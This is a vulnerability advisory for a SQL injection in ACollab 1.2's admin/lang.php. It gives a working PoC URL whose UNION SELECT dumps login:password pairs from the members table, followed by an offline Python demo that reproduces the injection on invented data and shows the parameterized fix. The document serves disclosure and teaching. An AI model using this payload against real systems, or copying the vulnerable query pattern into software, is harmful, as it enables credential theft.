------------------------------------------------------------------------
Software................ACollab 1.2
Vulnerability...........SQL Injection
Download................http://atutor.ca/acollab/
Release Date............1/31/2011
Tested On...............Windows Vista + XAMPP
------------------------------------------------------------------------
Author..................AutoSec Tools
Site....................http://www.autosectools.com/
------------------------------------------------------------------------

--Description--

An SQL injection vulnerability in ACollab 1.2 can be exploited to retrieve a list of usernames and passwords. The value of the t parameter of admin/lang.php is placed into an SQL query without sanitization. The PoC below closes the quoted string and appends a UNION SELECT with five columns (matching the original query) whose fourth column is GROUP_CONCAT(login,':',password) from the AC_members table, so the concatenated login:password list is returned by the query and shown on the page. Because the malicious string is stored in the session, it may be necessary to refresh the page before the output appears.

--PoC--

http://localhost/acollab/admin/lang.php?lang=&t=xxx'UNION%20SELECT%200,0,'error',GROUP_CONCAT(login,':',password),4%20FROM%20AC_members%20WHERE%20'a'='a
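The following is an added example, not code from the advisory or from ACollab. It reproduces the shape of the attack offline: it rebuilds the advisory's PoC URL from the raw payload, runs the same UNION SELECT against a hypothetical string-concatenated query (the real lang.php query and its table are not on the page; only the column names login/password, the table AC_members and the five-column count of the UNION are taken from the PoC) using SQLite as a stand-in for MySQL, and shows the parameterized form that defeats it. The AC_lang table, the lookup functions and the member rows are constructed for this demonstration.

```python
import sqlite3
from urllib.parse import quote

# Constructed sample rows standing in for ACollab's AC_members table.
# Column names come from the advisory's PoC; the values are invented.
SAMPLE_MEMBERS = [
    ("admin", "5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8"),
    ("alice", "b3daa77b4c04a9551b8781d03191fe098f325e67"),
    ("bob",   "a1881c06eec96db9901c7bbfe41c42a3f08e9cb4"),
]

# The t= value from the advisory's PoC, URL-decoded.
ADVISORY_PAYLOAD = (
    "xxx'UNION SELECT 0,0,'error',GROUP_CONCAT(login,':',password),4 "
    "FROM AC_members WHERE 'a'='a"
)


def build_poc_url(base="http://localhost/acollab/admin/lang.php",
                  payload=ADVISORY_PAYLOAD):
    """Rebuild the advisory's PoC URL from the raw payload.

    Only the spaces need escaping; quotes, commas, parentheses, ':' and '='
    are left alone so the result matches the advisory's URL exactly.
    """
    return f"{base}?lang=&t=" + quote(payload, safe="'(),:=")


def make_db():
    """In-memory SQLite database with constructed AC_members/AC_lang tables."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE AC_members (login TEXT, password TEXT)")
    conn.executemany("INSERT INTO AC_members VALUES (?, ?)", SAMPLE_MEMBERS)
    # Hypothetical five-column table for lang.php to read. The real schema is
    # unknown; five columns is what the injected UNION SELECT implies.
    conn.execute("CREATE TABLE AC_lang (id INTEGER, lang TEXT, type TEXT, "
                 "text TEXT, ord INTEGER)")
    conn.execute("INSERT INTO AC_lang VALUES (1, 'en', 'info', 'English', 1)")
    return conn


def lookup_vulnerable(conn, t):
    """Hypothetical vulnerable pattern: t is pasted straight into the SQL."""
    sql = f"SELECT * FROM AC_lang WHERE lang='{t}'"
    return conn.execute(sql).fetchall()


def lookup_fixed(conn, t):
    """Same lookup with a bound parameter; the payload is just a string."""
    return conn.execute("SELECT * FROM AC_lang WHERE lang=?", (t,)).fetchall()


def dump_credentials(conn):
    """Run the advisory's payload through the vulnerable lookup.

    SQLite's GROUP_CONCAT takes a single expression, so MySQL's
    GROUP_CONCAT(login,':',password) is rewritten with the || operator;
    the rest of the payload is unchanged.
    """
    payload = ADVISORY_PAYLOAD.replace(
        "GROUP_CONCAT(login,':',password)",
        "GROUP_CONCAT(login||':'||password)")
    rows = lookup_vulnerable(conn, payload)
    # The injected row is the one whose third column is the literal 'error';
    # its fourth column carries the concatenated login:password list.
    injected = next(r for r in rows if r[2] == "error")
    return sorted(injected[3].split(","))


if __name__ == "__main__":
    db = make_db()
    print(build_poc_url())
    print("vulnerable:", dump_credentials(db))
    print("fixed     :", lookup_fixed(db, ADVISORY_PAYLOAD))
```

The GROUP_CONCAT trick matters because the injected query can only surface one row's worth of text in the displayed column; packing every login:password pair into a single string gets the whole table out in one request. The parameterized version returns no rows for the payload because the quote never terminates the literal.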